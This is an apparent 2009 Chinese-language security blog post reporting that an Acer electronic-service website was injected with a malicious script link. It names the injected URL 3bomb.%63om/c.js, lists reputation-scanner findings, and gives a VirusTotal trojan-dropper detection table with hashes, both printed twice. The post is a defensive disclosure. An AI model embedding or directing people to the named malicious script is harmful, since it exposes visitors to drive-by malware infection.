宏碁微巨電子化服務網站被植入惡意連結
2009 年 02 月 02 日 – 10:54:49
宏碁微巨電子化服務網站被植入惡意連結(2009年1月30日就發現網頁被植入惡意連結,到目前為止,很多頁面還存在此惡意連結),最近有瀏覽這個網頁的網友,請要盡速檢查自己的電腦是否有中毒的情形。
宏碁微巨電子化服務網站被植入惡意連結頁面,如下所示:
惡意連結/程式碼是放置在上述網址 (很多頁面都有,可能資料庫有漏洞) 中的:
3bomb.%63om/c.js
下面是網頁信譽評等掃描的結果,如下所示:
Google Search 查詢結果(發現異狀),如下圖所示:
阿碼科技 HackAlert (偵測惡意行為) 查詢結果(發現異狀),如下圖所示:
McAfee SiteAdvisor 查詢結果(未發現異狀),如下圖所示:
趨勢科技網頁信譽評等查詢結果(發現異狀),如下圖所示:
賽門鐵克 Safe Web 查詢結果(發現異狀),如下圖所示:
下列是 VirusTotal 掃描結果 (僅提供參考):
File a1.css-pe received on 01.31.2009 18:55:08 (CET)
Result: 32/38 (84.21%)
Antivirus Version Last Update Result
a-squared – – Trojan-Dropper.Agent!IK
AhnLab-V3 – – Dropper/Downloader.39061
AntiVir – – TR/Dropper.Gen
Authentium – – W32/OnlineGames.AJ.gen!Eldorado
Avast – – Win32:Rootkit-gen
AVG – – Agent_r.IL.dropper
BitDefender – – Rootkit.Agent.AIWN
CAT-QuickHeal – – (Suspicious) – DNAScan
ClamAV – – -
Comodo – – -
DrWeb – – MULDROP.Trojan
eSafe – – Suspicious File
eTrust-Vet – – Win32/SillyDl!generic
F-Prot – – W32/OnlineGames.AJ.gen!Eldorado
F-Secure – – Trojan-Dropper.Win32.Agent.afyw
Fortinet – – suspicious
GData – – Rootkit.Agent.AIWN
Ikarus – – Trojan-Dropper.Agent
K7AntiVirus – – -
Kaspersky – – Trojan-Dropper.Win32.Agent.afyw
McAfee – – Generic Dropper
McAfee+Artemis – – Generic Dropper
Microsoft – – TrojanDownloader:Win32/Small.gen!K
NOD32 – – Win32/TrojanDownloader.Agent.OQW
Norman – – Suspicious_F.gen
nProtect – – -
Panda – – Suspicious file
PCTools – – Packed/FSG
Prevx1 – – -
Rising – – -
SecureWeb-Gateway – – Trojan.Dropper.Gen
Sophos – – Mal/Behav-024
Sunbelt – – Trojan.Win32.Packed.gen (v)
TheHacker – – Trojan/Dropper.Agent.afyw
TrendMicro – – TROJ_DROPPER.HII
VBA32 – – suspected of Win32.Trojan.Downloader (http://…)
ViRobot – – Dropper.Agent.39305
VirusBuster – – Packed/FSG
a-squared – – Trojan-Dropper.Agent!IK
AhnLab-V3 – – Dropper/Downloader.39061
AntiVir – – TR/Dropper.Gen
Authentium – – W32/OnlineGames.AJ.gen!Eldorado
Avast – – Win32:Rootkit-gen
AVG – – Agent_r.IL.dropper
BitDefender – – Rootkit.Agent.AIWN
CAT-QuickHeal – – (Suspicious) – DNAScan
ClamAV – – -
Comodo – – -
DrWeb – – MULDROP.Trojan
eSafe – – Suspicious File
eTrust-Vet – – Win32/SillyDl!generic
F-Prot – – W32/OnlineGames.AJ.gen!Eldorado
F-Secure – – Trojan-Dropper.Win32.Agent.afyw
Fortinet – – suspicious
GData – – Rootkit.Agent.AIWN
Ikarus – – Trojan-Dropper.Agent
K7AntiVirus – – -
Kaspersky – – Trojan-Dropper.Win32.Agent.afyw
McAfee – – Generic Dropper
McAfee+Artemis – – Generic Dropper
Microsoft – – TrojanDownloader:Win32/Small.gen!K
NOD32 – – Win32/TrojanDownloader.Agent.OQW
Norman – – Suspicious_F.gen
nProtect – – -
Panda – – Suspicious file
PCTools – – Packed/FSG
Prevx1 – – -
Rising – – -
SecureWeb-Gateway – – Trojan.Dropper.Gen
Sophos – – Mal/Behav-024
Sunbelt – – Trojan.Win32.Packed.gen (v)
TheHacker – – Trojan/Dropper.Agent.afyw
TrendMicro – – TROJ_DROPPER.HII
VBA32 – – suspected of Win32.Trojan.Downloader (http://…)
ViRobot – – Dropper.Agent.39305
VirusBuster – – Packed/FSG
Additional information
MD5: 389aaf2a396c412e18af2fa3e946a35c
SHA1: f664718c46f7799a590143eb9097559e8df73a79
SHA256: 6d0840c7413b23c4277e0619a69901ce419c3225bfaf23fe1f706fd8bd2d7c9e
SHA512: 7869724d21d55c485d232e37c56a29cca3f1b42561e61dfac91c279836bbb34e98cd479f5a187741dbbff721028d8b3dd884ddfa679a5cef3a1df79fdcbd6bf4
MD5: 389aaf2a396c412e18af2fa3e946a35c
SHA1: f664718c46f7799a590143eb9097559e8df73a79
SHA256: 6d0840c7413b23c4277e0619a69901ce419c3225bfaf23fe1f706fd8bd2d7c9e
SHA512: 7869724d21d55c485d232e37c56a29cca3f1b42561e61dfac91c279836bbb34e98cd479f5a187741dbbff721028d8b3dd884ddfa679a5cef3a1df79fdcbd6bf4
“宏碁微巨電子化服務網站被植入惡意連結” 目前有 2 迴響
第二個圖,點進去的大圖不符合喔
是不是檔案放錯了?
By guest on 2009 年 02 月 2 日 - 17:15:42
已修正。
By Roger on 2009 年 02 月 2 日 - 17:40:12